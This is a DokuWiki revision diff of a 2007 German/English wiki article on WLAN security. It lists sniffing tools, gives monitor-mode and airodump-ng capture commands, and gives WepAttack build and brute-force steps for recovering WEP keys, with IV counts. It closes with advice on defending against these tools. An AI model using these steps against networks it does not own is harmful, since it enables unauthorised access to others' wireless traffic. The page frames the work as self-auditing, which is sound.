Unterschiede
Hier werden die Unterschiede zwischen zwei Versionen angezeigt.
Beide Seiten der vorigen Revision Vorhergehende Überarbeitung | |||
security:wlan-security [2007/04/17 19:08] – st | security:wlan-security [2007/09/12 16:27] (aktuell) – st | ||
---|---|---|---|
Zeile 1: | Zeile 1: | ||
+ | ====== WLAN Security ====== | ||
+ | FIXME Das Dokument ist teilweise veraltet, ein neuerer und optimierter Angriff existiert. | ||
+ | prismstumbler\\ | ||
+ | aircrack\\ | ||
+ | NetStumbler\\ | ||
+ | [[http:// | ||
+ | ASLeap\\ | ||
+ | (Ethereal) neuer Name: wireshark | ||
+ | |||
+ | * **[[WEP-Cracking]]** | ||
+ | |||
+ | |||
+ | |||
+ | ===== Links ===== | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | |||
+ | ===== Tools ===== | ||
+ | |||
+ | ==== Vorbereitung ==== | ||
+ | Zuerst muss man die Wlan-Karte in den so genannten monitor-modus versetzen, d.h. die Karte verwirft nicht gleich alle Pakete die nicht direkt an sie gerichtet sind, sondern ermöglicht eine Auszeichnung aller Pakete. | ||
+ | |||
+ | iwconfig wlan0 mode monitor | ||
+ | iwconfig wlan0 channel 1 | ||
+ | |||
+ | ==== Kismet ==== | ||
+ | [[http:// | ||
+ | |||
+ | Kismet scans for available networks and gives you some interesting information | ||
+ | about them. | ||
+ | |||
+ | #> apt-get -t testing install kismet | ||
+ | |||
+ | Man muss die ''/ | ||
+ | zcat / | ||
+ | die Hilfe anzeigen lassen. In der Section 12: " | ||
+ | |||
+ | Also z.B. | ||
+ | source=prism2_hostap, | ||
+ | wobei als erstes der Treiber steht, dann das interface. | ||
+ | |||
+ | FIXME | ||
+ | You need to be root to run kismet. When started it gathers information about the | ||
+ | available networks in an " | ||
+ | interesting network (eg. your own) press '' | ||
+ | choice, then select the network and press '' | ||
+ | |||
+ | Make sure your network has WEP encryption enabled. It is possible to hide the | ||
+ | name of your network (SSID hiding) -- however kismet will detect it nontheless it | ||
+ | will show it as " | ||
+ | |||
+ | Kismet logs received packets to ''/ | ||
+ | later. | ||
+ | |||
+ | ==== Airodump ==== | ||
+ | Ebenfalls ein Wlan-Sniffer. | ||
+ | [[http:// | ||
+ | |||
+ | ==== Sniffen ==== | ||
+ | airodump-ng --channel 1 --abg --write dumpfile --ivs ath0 | ||
+ | --ivs kann man angeben wenn nur den WEP-Schlüssel knacken will | ||
+ | |||
+ | <box> | ||
+ | Man braucht etwa 50,000 bis 200,000 IVs für 64 bit WEP | ||
+ | und 200,000 bis 700,000 IVs für einen 128 bit key | ||
+ | </ | ||
+ | ==== AirSnort ==== | ||
+ | |||
+ | The next tool to use is AirSnort. This is a GTK based networksniffer similar to | ||
+ | kismet but able to break WEP encryption. Install it and run it as root. | ||
+ | |||
+ | #> apt-get -t testing install airsnort | ||
+ | |||
+ | Some theory first. WEP uses the RC4 Algorithm which isn't the safest in world. | ||
+ | In fact it has some known security flaws which are described [[http:// | ||
+ | Simplified spoken there are a few thousand keys which are weak and easy to | ||
+ | decrypt. A few years ago you just had to run a tool like AirSnort to crack WEP | ||
+ | encrption in a few minutes by fetching these weak keys from the air. | ||
+ | |||
+ | Well nowadays all manufactuers have changed their WEP implementations to avoid | ||
+ | these weak keys so AirSnort will need a laarge amount of Packets to get the WEP password. If you | ||
+ | get a lot of " | ||
+ | Hardware in your net which needs to be updated. | ||
+ | |||
+ | ==== WepAttack ==== | ||
+ | |||
+ | Even if the manufacturers don't use the weak keys in WEP anymore there is room | ||
+ | for an simple attack: Using brute force to guess the WEP password. The | ||
+ | interesting thing is that this can be done completely undetected. All that is | ||
+ | needed is a single passively sniffed packet. | ||
+ | |||
+ | Lets install the tool first. Get it from http:// | ||
+ | unpack it. For compiling you need some libraries, too. | ||
+ | |||
+ | #> apt-get -t testing install libssl-dev libpcap-dev | ||
+ | $> tar -xzvf WepAttack-0.1.3.tar.gz | ||
+ | $> cd WepAttack-0.1.3/ | ||
+ | $> make | ||
+ | #> cp wepattack / | ||
+ | |||
+ | To brute force attack a WEP encrypted packet you need a wordlist (available | ||
+ | from the above site) and a packet dump from kismet. Then just run the following | ||
+ | command. | ||
+ | |||
+ | $> wepattack -f / | ||
+ | |||
+ | If this finds your password it is too weak. | ||
+ | |||
+ | ===== Summary ===== | ||
+ | If your WLAN passes all these tests it should be considerably safe from most | ||
+ | crackers. At our company all traffic to the internal LAN is additionally | ||
+ | encrypted by [[netzwerke: | ||
+ | |||
+ | ===== Protecting Against These Tools ===== | ||
+ | [[http:// | ||
+ | |||
+ | Just as it’s important to know how to utilize the aforementioned tools, it is important to know best practices on how to secure your Wireless Network Against these tools. | ||
+ | |||
+ | NetStumbler – Do not broadcast your SSID. Ensure your WLAN is protected by using advanced Authentication and Encryption. | ||
+ | |||
+ | Kismet – There’s really nothing you can do to stop Kismet from finding your WLAN, so ensure your WLAN is protected by using advanced Authentication and Encryption | ||
+ | |||
+ | Airsnort – Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software update). | ||
+ | |||
+ | Cowpatty – Use a long and complex WPA Pre-Shared Key. This type of key would have less of a chance of residing in a dictionary file that would be used to try and guess your key and/or would take longer. If in a corporate scenario, don’t use WPA with Pre-Shared Key, use a good EAP type to protect the authentication and limit the amount of incorrect guesses that would take place before the account is locked-out. If using certificate-like functionality, | ||
+ | |||
+ | ASLeap – Use long and complex credentials, | ||
+ | |||
+ | Ethereal – Use encryption, so that anything sniffed would be difficult or nearly impossible to break. WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), |